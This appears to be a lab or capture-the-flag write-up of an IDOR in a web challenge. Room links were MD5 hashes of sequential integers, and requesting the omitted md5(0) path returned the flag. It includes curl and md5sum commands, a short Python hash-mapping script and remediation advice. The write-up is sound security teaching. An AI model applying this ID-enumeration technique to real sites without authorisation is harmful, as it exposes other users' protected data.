MD5 room-id IDOR and missing zero index path
Foundations web engagement: corridor door links used MD5 hashes of sequential integers; rooms 1–13 were linked, md5(0) was omitted from the UI but directly addressable and returned the secret.
- Case files
- MD5 room-id IDOR and missing zero index path
View-source revealed MD5 path segments for doors 1–13; hashing 0 produced the missing route that served the flag.
Identified MD5 of 1–13 from door links; requested MD5 of 0 for the hidden room.
Engagement summary
View-source revealed MD5 path segments for doors 1–13; hashing 0 produced the missing route that served the flag.
CORRIDOR rendered a hallway of doors whose hrefs were 32-character hex strings. Source inspection showed each link as /<md5>. Online and offline MD5 lookups mapped the set to integers 1 through 13 — room 0 was absent from the HTML but not from the application. Computing md5(0) = cfcd208495d565ef66e7dff9f98764da and requesting that path returned the engagement artifact. Classic insecure direct object reference: authorization keyed on an guessable identifier with no access control behind sequential IDs.
Business impact
Hashing a sequential ID does not grant confidentiality. Attackers reconstruct the mapping and probe omitted indices. Use non-guessable identifiers (UUIDv4), enforce object-level authorization, and never rely on UI omission as an ACL.
Hash map reconstruction and md5(0) request
Identified MD5 of 1–13 from door links; requested MD5 of 0 for the hidden room.
OPERATOR · IDOR
savvy@lab:~$ curl -s http://10.10.10.10/ | grep -oE '[a-f0-9]{32}' | sort -u
c4ca4238a0b923820dcc509a6f75849b # md5(1) ... c51ce410c124a10e0db5e4b97fc2af39 # md5(13)
savvy@lab:~$ echo -n 0 | md5sum
cfcd208495d565ef66e7dff9f98764da
savvy@lab:~$ curl -s http://10.10.10.10/cfcd208495d565ef66e7dff9f98764da
flag{2477ef02448ad9156661ac40a6b8862e}
MAPPING CHECK
corridor_idor.py
import hashlib
for i in range(0, 14):
print(i, hashlib.md5(str(i).encode()).hexdigest())Remediation
Replace predictable path IDs with opaque tokens. Authorize every object fetch server-side against the caller’s session. Soft-delete or hide resources in the data layer — not by omitting links from HTML.